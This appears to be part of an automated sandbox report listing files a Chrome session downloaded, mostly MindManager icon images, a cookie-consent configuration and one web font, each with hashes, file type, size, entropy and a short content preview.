                                                                SHA1:E9D4F59BFFD80550CF055FA6043519C6F7B782F0
                                                                SHA-256:1467473C32B3EB8910B4BA723853CF3A3121E020883674118A1DBB64BAFC15F7
                                                                SHA-512:92823C718A6247A10B6B00D73E0B333A3CDDF125206469E123F5344460BD2F109AE3CC834B9A4A467477F4B4E91D5C0DC46B5A450F530AB207D763BAACDABE67
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/explosion.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 21.25 18.25"><defs><style>.cls-1{fill:#fff;stroke:gray;stroke-miterlimit:10;}</style></defs><title>background_shape_Asset 73</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M5.13,4.6c5.88,1.75,7.4-2.28,7.4-2.28s.19,2.7,4.75,2.47c-1.19,1.42-.57,2.89,1.61,3.61-1.28.14-3.84,2-2.84,6-2.47-1.52-5-.81-7.22,2.32-.1-2.28-2.23-6-5.94-6.31C5.79,9.68,6.36,6.88,5.13,4.6Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1603
                                                                Entropy (8bit):4.445385552146584
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6532596CA6629D79C1D3B47F1EFE8C2F
                                                                SHA1:E2B93253A38380265A115A6E23CA4D58A8EE98A2
                                                                SHA-256:37C1F9EF42AA5B9ED82F5C01A2D0552A8224ADDC7612B86B2D86E5E3A0558A44
                                                                SHA-512:CDFA420DE7393394DDE9033E2508593944197096B12F3E5F9BA02E8A5D8AD13091902259DE7C3990D25E3E0A7B9D6D9998765415D65284E2F8F2DD4F3DD425E9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/inspector/comment_edit.svg
                                                                Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 17.1 17.09">. <defs>. <style>.cls-1{fill:#5c707c;}</style>. </defs>. <title>edit comment</title>. <g id="Layer_2" data-name="Layer 2">. <g id="Layer_1-2" data-name="Layer 1">. <path class="cls-1" d="M17.1,4.5a4.43,4.43,0,0,1-.44,1.93l0,.07,0,.06h0l-9.5,9.5a.31.31,0,0,1-.11.08l-.14,0-6.29.91H.45a.49.49,0,0,1-.17,0A.35.35,0,0,1,.13,17,.44.44,0,0,1,0,16.79a.41.41,0,0,1,0-.21l.9-6.3a.39.39,0,0,1,0-.14A.5.5,0,0,1,1,10l9.5-9.5.06,0,.07,0A4.4,4.4,0,0,1,11.6.11a4.52,4.52,0,0,1,1-.11,4.38,4.38,0,0,1,1.75.35,4.52,4.52,0,0,1,2.39,2.4A4.35,4.35,0,0,1,17.1,4.5ZM1.23,14.41,1,16.12l1.71-.25v-.12a1.3,1.3,0,0,0-.4-1,1.29,1.29,0,0,0-.95-.4H1.23Zm.12-.91a2.18,2.18,0,0,1,.87.18,2.22,2.22,0,0,1,.71.48,2.39,2.39,0,0,1,.48.72,2.12,2.12,0,0,1,.18.87l2.66-.38c0-.09,0-.17,0-.26s0-.17,0-.26A3.92,3.92,0,0,0,6,13.27,4.15,4.15,0,0,0,5.11,12a4.07,4.07,0,0,0-1.29-.87,4,4,0,0,0-1.57-.32H2l-.25,0ZM9.11,3.23,2.43,9
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):5529
                                                                Entropy (8bit):4.97115097286016
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5EC2F5BF43F1CD9560D87E74565206D0
                                                                SHA1:92B1885EEF6F3165AC8B8B9C588D51520CB7720E
                                                                SHA-256:91C804E555E4699F93486196FD927FE6D676FF5F069F9B6F592481BE78C9C072
                                                                SHA-512:5E49114511CF399957EC673A851F812BC1C52A16CB856C04CB2062FE54FACA4DC48E0A16FEAF2874E9280466BDC8FAD4AA8C23CF32A10DD7AFDBB4762F1FDA94
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:{"CookieSPAEnabled":false,"CookieSameSiteNoneEnabled":false,"CookieV2CSPEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"PRODUCTION","Version":"202402.1.0","OptanonDataJSON":"eed76835-ae82-4859-b68b-69c7a2ea639c","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","BulkDomainCheckUrl":"https://cookies-data.onetrust.io/bannersdk/v1/domaingroupcheck","RuleSet":[{"Id":"018df7a8-de7d-7f0b-8051-41f5786e3883","Name":"Global","Countries":["pr","ps","pw","py","qa","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","sd","bs","bt","bv","sh","bw","by","sj","bz","sl","sn","so","sr","ss","cc","cd","st","sv","cf","cg","sx","ci","sy","sz","ck","cl","cm","co","tc","cr","td","tf","cu","tg","cv","th","cw","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","tz","dj","dm","do","ua","ug","dz","um","
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3312
                                                                Entropy (8bit):4.930834308297066
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DF890D51D24D0ADB720F4C21B572F709
                                                                SHA1:D4BABC76243C6150FD2F2420D63688E39553B184
                                                                SHA-256:A12AB85A96CC3BA8C3A9AEB4601C9CBA08396BE607632AA078B52FCB290BE27F
                                                                SHA-512:E71AB7A6E9D9779F31979D12E4FE1D5245998A5A8D3D363D174A9D559D056D59574165367C74678CA343DA76C2E71329F031EF1DB20B6ABBBF451ECC8874B7CB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/swotanalysis.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M43 1.43789H83.8314C84.3284 1.43789 84.7314 1.84083 84.7314 2.33789V44.1693C84.7314 44.6663 84.3284 45.0693 83.8314 45.0693H42C41.5029 45.0693 41.1 44.6663 41.1 44.1693V3.33789C41.1 2.28855 41.9507 1.43789 43 1.43789Z" fill="#FFE145" stroke="white" stroke-width="0.2"/>.<path d="M42 45.2699H83.8314C84.3284 45.2699 84.7314 45.6729 84.7314 46.1699V88.0013C84.7314 88.4983 84.3284 88.9013 83.8314 88.9013H43C41.9507 88.9013 41.1 88.0506 41.1 87.0013V46.1699C41.1 45.6729 41.5029 45.2699 42 45.2699Z" fill="#F9D5B8" stroke="white" stroke-width="0.2"/>.<path d="M85.8311 1.43789H126.662C127.712 1.43789 128.562 2.28855 128.562 3.33789V44.1693C128.562 44.6663 128.159 45.0693 127.662 45.0693H85.8311C85.334 45.0693 84.9311 44.6663 84.9311 44.1693V2.33789C84.9311 1.84083 85.334 1.43789 85.8311 1.43789Z" fill="#8BC1CD" stroke="white" stroke-width="0.2"/>.<path d="M85.8311 45.2699H127.662C128.159 4
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):795
                                                                Entropy (8bit):5.063473502386532
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3FE899CA0799438045D37288B4309565
                                                                SHA1:3B9426445497EE31D6E91212546A2F86FB248C97
                                                                SHA-256:A75ABF11DC7E4787B4DD2DE557F8D271CC8410FE5D3C7E29DADA109ABAB99183
                                                                SHA-512:0EE00AD23C25C8E5EFE2E997036D29A387597DB5CE45092F2F65CDD7EB7FE8FAB805C5EE07F615DBCC0167DFB119C2AAD440D93759A0F43E493E168BB2003F93
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/theme/assets_preset_icon.svg
                                                                Preview:<svg width="18px" height="18px" viewBox="0 0 18 18" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 49.3 (51167) - http://www.bohemiancoding.com/sketch -->. <desc>Created with Sketch.</desc>. <defs></defs>. <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Group" stroke="#3A52A4">. <rect id="Rectangle" x="0.5" y="0.5" width="17" height="17"></rect>. <path d="M9.5,4.5 L9.5,12.6904762" id="Line-2-Copy" stroke-linecap="round"></path>. <path d="M12.5,10.5 L9.5,13.5" id="Line-2" stroke-linecap="round"></path>. <path d="M6.5,10.5 L9.32172518,13.3217252" id="Line-2" stroke-linecap="round"></path>. </g>. </g>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                Category:downloaded
                                                                Size (bytes):35970
                                                                Entropy (8bit):7.989503040923577
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/yz3I6WVqnb7889Ocqr49
                                                                Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 20 x 19, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):3462
                                                                Entropy (8bit):7.918439614010008
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4514DE79CA3FA24F74CF4BD35A1E3898
                                                                SHA1:13604A2571420FC8597B22C52CDA746B1AB40D5E
                                                                SHA-256:6A222E8D027C10011E7D51B11382A3A1EDD6A9FC43E7185E432E22AAC93D6E56
                                                                SHA-512:ED7F5DC0877D4AF776D25561855334020821B88C7930BE7E1073B413F1EFE80AF62CDFBFC430F0A95FDE1190603233BC3F27645AAB48A1E22E0A76E408C972E5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-collapse-branch.png
                                                                Preview:.PNG........IHDR...............-.....iCCPICC Profile..H....P..............;...@A:.JHB.%...l..+..DD...R.\......"`....(.b..*....7o....../g.wr..3.......O.e.H..!........w.., .#`.`.......o5y..Ft.t.....W..B&.P0..,!3....f..".P.H\{..?...+....n.a....p...1.....'..$.C....F..&..C.A......C...`!\..Ijj..w l../u8.V3^R...Hxn.Y.B~.#.........oh!..(..A>..=.NN..0/~y.<sY....(...g..3f.Y...y.'...3C..,WD..gAZ..>[..*...JzHY.....}....".9...|.....9...@.".9A.#.1U......(1.o..(I.,...$.....E.....`I>;.W..f.J..!.l......u.%...@"...`.6..x..R......!.#...9.".:....i.L...(..#..M..f&4Ks...f..._..:{. .Xz....H...ch.......BL..r\..p..).d..f.-.."...@...m`.L.%..N..x....L..V.&2O*2.Z..l.y.....A)8...jp.....\.W.M...'.....`.L.)..p...@.....C..=..yC.P....A.......V..*.J.cP.....]..C..#h....A_`.L..`5X.^....p.....9p:........>.7....=..~.O..J.EEi.LQ.(OT.*.....6..Q.rT=......G..>..h...6E;....h&:.....]..F7./........2F.c.q..1Q..f-&.S...4b.`.a.0.X,.....a....$.z.N.al......N.p8e.1....c.D.<.A....\.n.../...[.}.1x.>._......
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):927
                                                                Entropy (8bit):5.399868646883449
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BB7E744F2F90F7D781925CA7AE328800
                                                                SHA1:C65F2EA71638863760712BB49AC479BCFE553EA4
                                                                SHA-256:6B6704BDC5CCB9770AA4A8C37729AF571214DFED970B94F23358F5FC9820AF9B
                                                                SHA-512:CC8DD4C85EC9F274DFD43D9FCD4F86155449A886E5954F5E64B6D81B1B738BCB559DEC5EEE4E9F45FF4807F88B18922B0873B40AD62672BF6B35510BD33081F9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_layout_left_right.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 19.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="30.4px" height="8.5px" viewBox="0 0 30.4 8.5" enable-background="new 0 0 30.4 8.5" xml:space="preserve">..<g>...<path fill="#5c707c" d="M17.2,8.5h-3.8c-2.2,0-4-1.8-4-4V4c0-2.2,1.8-4,4-4h3.8c2.2,0,4,1.8,4,4v0.5C21.2,6.7,19.4,8.5,17.2,8.5z.... M13.4,2c-1.1,0-2,0.9-2,2v0.5c0,1.1,0.9,2,2,2h3.8c1.1,0,2-0.9,2-2V4c0-1.1-0.9-2-2-2H13.4z"/>...<g>....<rect x="4.2" y="2.5" fill="#5c707c" width="6" height="2"/>....<g>.....<polygon fill="#5c707c" points="5.2,1 0,4 5.2,7 ..."/>....</g>...</g>...<g>....<rect x="20.2" y="2.5" fill="#5c707c" width="6" height="2"/>....<g>.....<polygon fill="#5c707c" points="25.2,7 30.4,4 25.2,1 ..."/>....</g>...</g>..</g>..</svg>..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):12833
                                                                Entropy (8bit):3.9750007910693657
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:332AACE545CAA42582B555A7C78F1903
                                                                SHA1:46B20C5E33A014A790BC641C118DB5246AD36D23
                                                                SHA-256:CB2D2CFE1105D8F8CA8704F8DF134A5892349FA5B0BBD23CD40BE422A1285223
                                                                SHA-512:9821E841183D0BA822261A5B0B2AFD860CEBD6B16DADEA853CA1EAC393E0B657ABE00E23C244CE99D66133C28EF2BE9F57603600085A3ADD4305208E2E8314BB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/mm-23-go-logo.svg
                                                                Preview:<svg width="161" height="26" viewBox="0 0 161 26" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_424_974)">.<path d="M150.13 8.65012C149.997 7.67311 149.514 6.77764 148.77 6.13012C147.995 5.54625 147.039 5.25256 146.07 5.30012C145.074 5.28282 144.091 5.52768 143.22 6.01012C142.403 6.48224 141.703 7.1315 141.17 7.91012C140.625 8.71317 140.22 9.60228 139.97 10.5401C139.712 11.4955 139.581 12.4806 139.58 13.4701C139.564 14.2898 139.678 15.1068 139.92 15.8901C140.128 16.5279 140.469 17.1142 140.92 17.6101C141.347 18.0607 141.875 18.4034 142.46 18.6101C143.1 18.8472 143.778 18.9625 144.46 18.9501C144.951 18.9533 145.44 18.903 145.92 18.8001C146.334 18.7062 146.739 18.5757 147.13 18.4101C147.429 18.2938 147.72 18.1568 148 18.0001C148.209 17.869 148.409 17.7254 148.6 17.5701L149.6 13.0701H145.42L145.5 12.6901H150.1L149 17.7001C148.778 17.8922 148.54 18.0661 148.29 18.2201C147.972 18.4269 147.637 18.6075 147.29 18.7601C146.864 18.9416 146.422 19.0822 145.97 19.1801C14
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):866
                                                                Entropy (8bit):5.274876465448954
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0EB26C8E4FE94249F1DD41988DA9F0CC
                                                                SHA1:193FFB5114613DA0A712500BC0B2499486B5E696
                                                                SHA-256:05AD6A3CA4EACED21009DB41DC1BF25C3020063A66F8D108282308A1E63071ED
                                                                SHA-512:7C1C5DDB62EB82E206E8E38F1551732032B34D5C497BE7A9BE41E2659C18416FA9C33BCEF1E055C57AAB706BE46E1C3EBB12A381EFA51012BC7636169398C3D8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_add_subtopic.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><defs><style>.cls-1{fill:#63a558;}.cls-2{fill:#96be7d;stroke:#63a558;}.cls-2,.cls-4{stroke-miterlimit:10;}.cls-3{fill:#fff;}.cls-4{fill:#ccc;stroke:gray;}</style></defs><title>web app toolbar assets add subtopic</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M4,8H3v9.12c0,.48.7.88,1.25.88H8V17H4Z"/><rect class="cls-2" x="6.5" y="14.5" width="17" height="9" rx="4"/><polygon class="cls-3" points="13.5 22.5 13.5 20.5 11.5 20.5 11.5 17.5 13.5 17.5 13.5 15.5 16.5 15.5 16.5 17.5 18.5 17.5 18.5 20.5 16.5 20.5 16.5 22.5 13.5 22.5"/><path class="cls-1" d="M16,16v2h2v2H16v2H14V20H12V18h2V16h2m1-1H13v2H11v4h2v2h4V21h2V17H17V15Z"/><rect class="cls-4" x="0.5" y="0.5" width="16" height="8" rx="4"/></g></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):487
                                                                Entropy (8bit):5.136093701222415
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:003099FABF0A5933AB3826D8CC93EA65
                                                                SHA1:7946369EF91B084C705F6C9B282869FD3EE1D5FA
                                                                SHA-256:AE13693EC3E6B00EA1226FFA1D2FA97FA74A72F1BBE7E6206D168CBFF38B8ACC
                                                                SHA-512:8C2D03CF6D7ADC2A5533E305A6BCE9BEF8601D799515688E632CEB106C24C260F3041EC61BEC7985D8AF5FEFC37FF425630F3565DA2D70DEBD2A4918BE2A18DB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/rounded-rectangle.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 12"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}</style></defs><title>background_shape_Asset 67</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="0.5" y="0.5" width="15" height="11" rx="2.5"/><path class="cls-2" d="M13,1a2,2,0,0,1,2,2V9a2,2,0,0,1-2,2H3A2,2,0,0,1,1,9V3A2,2,0,0,1,3,1H13m0-1H3A3,3,0,0,0,0,3V9a3,3,0,0,0,3,3H13a3,3,0,0,0,3-3V3a3,3,0,0,0-3-3Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):41865
                                                                Entropy (8bit):4.199488548146343
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2ED31E27991ED129BB3CE477F57C3785
                                                                SHA1:3BA22FFE9CB667F685E0A6CD22FCE4271A80AB14
                                                                SHA-256:9C067E38CE154435907599D1DBA7C31EBD3E1FB6E8F31FCFA9AC595B668B32D3
                                                                SHA-512:AEB4E327822579DA0317C24006EF0A4FC4CEEEFD0DB86C9EDFB647F79BC54B5871265B9AD000AF2D39329182D4DF0A0691F94B7E9F60D625581EDF16F0760FA3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_personal.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="200" height="250" rx="10" fill="#CCEBEA"/>..<g clip-path="url(#clip0_456_6298)">..<path d="M104.193 69.2211C115.757 68.9918 127.418 66.3581 138.787 68.4839C159.563 72.3683 175.346 93.9981 172.705 114.968C170.065 135.938 149.414 152.981 128.324 151.594C121.511 151.147 114.522 149.06 108.005 151.096C99.3209 153.809 93.9918 163.101 85.36 165.979C73.6702 169.875 58.8085 160.094 49.8105 153.402C40.5289 146.499 29.7633 136.198 25.4713 125.158C21.0433 113.768 21.8366 98.6773 25.153 87.1161C28.1255 76.7537 35.5992 68.021 45.5691 63.8196C57.7217 58.6981 67.6409 62.534 79.4848 65.9545C87.5102 68.277 95.8394 69.3782 104.193 69.2211Z" fill="#9CE0DE"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M154.267 72.2717C141.081 72.2717 130.391 82.9612 130.391 96.1474C130.391 109.334 141.081 120.023 154.267 120.023C167.453 120.023 178.143 109.334 178.143 96.1474C178.143 82.9612 167.453 72.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):759
                                                                Entropy (8bit):5.4374799349541485
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EFED2D33DB0E0B11136079F124616509
                                                                SHA1:15E3EEE1608EDF5D38D4D15CBD5AD69D04A6969B
                                                                SHA-256:3A7FB5B2A9636E4E8AEB051F68C05D666B6A484B843335211FD52CF32EB23052
                                                                SHA-512:4C801C95CA65227645A73B26249D58843ACA2B8591AE53A55471A3BAE8E494E42165927565EB325262CC3CACD888B3A153AF5A6785A0088B55BADF8F4F246708
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_layout_right.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 19.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="21.1px" height="8.5px" viewBox="0 0 21.1 8.5" enable-background="new 0 0 21.1 8.5" xml:space="preserve">..<g>...<path fill="#5c707c" d="M7.8,8.5H4c-2.2,0-4-1.8-4-4V4c0-2.2,1.8-4,4-4h3.8c2.2,0,4,1.8,4,4v0.5C11.8,6.7,10.1,8.5,7.8,8.5z M4,2....C2.9,2,2,2.9,2,4v0.5c0,1.1,0.9,2,2,2h3.8c1.1,0,2-0.9,2-2V4c0-1.1-0.9-2-2-2H4z"/>...<g>....<rect x="11" y="2.5" fill="#5c707c" width="6" height="2"/>....<g>.....<polygon fill="#5c707c" points="16,7 21.1,4 16,1 ..."/>....</g>...</g>..</g>..</svg>..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):856
                                                                Entropy (8bit):5.0055884449174926
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:15D7AB0CFFAD4005D9F7D2C8B28B4ED9
                                                                SHA1:68E0610302EE53A4B9F56325A1E46E69F73C7E21
                                                                SHA-256:12B7F4FACEA54855DD781A2BB201E0C23CF5075EEDF3E5092CD740FD7B35538E
                                                                SHA-512:56D4E18AFEE4E4E5A13D81DFAE59776D14C4355E24AF59B23F84E84062B7D3CB19102BDF6F63229B632FDF0FB6DC24B66862C3384DA34ECD1C633978EE570388
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/close.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="15.6px" height="15.6px" viewBox="0 0 15.6 15.6" enable-background="new 0 0 15.6 15.6" xml:space="preserve">.<g>..<path fill="#3a52a4" d="M8.6,7.8l6.8,6.8c0.1,0.1,0.2,0.3,0.2,0.4s-0.1,0.3-0.2,0.4c-0.1,0.1-0.1,0.1-0.2,0.1s-0.2,0-0.2,0...c-0.1,0-0.1,0-0.2,0s-0.1-0.1-0.2-0.1L7.8,8.6L1,15.4c-0.1,0.1-0.1,0.1-0.2,0.1s-0.1,0-0.2,0c-0.1,0-0.2,0-0.2,0s-0.1-0.1-0.2-0.1...C0.1,15.3,0,15.2,0,15s0.1-0.3,0.2-0.4L7,7.8L0.2,1C0.1,0.9,0,0.8,0,0.6s0.1-0.3,0.2-0.4S0.4,0,0.6,0S0.9,0.1,1,0.2l6.8,6.8...l6.8-6.8C14.7,0.1,14.8,0,15,0s0.3,0.1,0.4,0.2s0.2,0.3,0.2,0.4S15.6,0.9,15.4,1L8.6,7.8z"/>.</g>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3139
                                                                Entropy (8bit):4.0945606499693685
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:904DEC3FD68A04EC2389A8BF635D55DC
                                                                SHA1:F642BE49AFACE85F6C4F71C96F5044ACB000A5ED
                                                                SHA-256:7207C7FA3AD8C79770C7281F58898DCD934A7068FE3EAA62B51B35C59A49D18F
                                                                SHA-512:60056E27653C19E9D01D27EAF85E6F9CFF891C2DA46D235FF55236893AE437A5015688AC34EA409AA560F53D7B8FD27A0FB21EFC78DDC4690CCB9662984D2669
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/pin.svg
                                                                Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0)">.<path d="M21.5977 7.35156L15.2461 1C15.1367 0.890625 15.0078 0.804687 14.8594 0.742188C14.7109 0.679688 14.5586 0.648438 14.4023 0.648438C14.2383 0.648438 14.082 0.679688 13.9336 0.742188C13.793 0.804687 13.6641 0.890625 13.5469 1L13.1953 1.35156C13.0234 1.52344 12.8789 1.74609 12.7617 2.01953C12.6523 2.29297 12.5977 2.55469 12.5977 2.80469V4C12.5977 4.08594 12.5703 4.19141 12.5156 4.31641C12.4688 4.44141 12.4141 4.53516 12.3516 4.59766L9 7.94922C8.9375 8.01172 8.84375 8.07031 8.71875 8.125C8.59375 8.17188 8.48828 8.19531 8.40234 8.19531H7.19531C6.95312 8.19531 6.69531 8.25391 6.42188 8.37109C6.14844 8.48047 5.92578 8.625 5.75391 8.80469L5.40234 9.15625C5.16797 9.39062 5.05078 9.67188 5.05078 10C5.05078 10.3281 5.16797 10.6094 5.40234 10.8438L7.26562 12.707L1.32422 20.4297C1.23047 20.5547 1.1875 20.6914 1.19531 20.8398C1.21094 20.9883 1.26953 21.1172 1.37109 21.22
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2161
                                                                Entropy (8bit):4.433779272240518
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F14AA92E7E53F1AD84852B4DF5891443
                                                                SHA1:34AC3A418816A1993D6C18523A2C28B47FAD0D85
                                                                SHA-256:AD615D118259D54E28838BD27F5A49CC5F697AE1A8C41F99FB0398C093E5C43E
                                                                SHA-512:AE5480E2B0A462F1D20A697F1F2B128B7A2EE7094E2142CA55940BD3512815FB59BE8DA611A49EAFB07C14D91F3F8D4D06AFD03EEF29E165DF77526D1E449196
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/roPriority08.svg
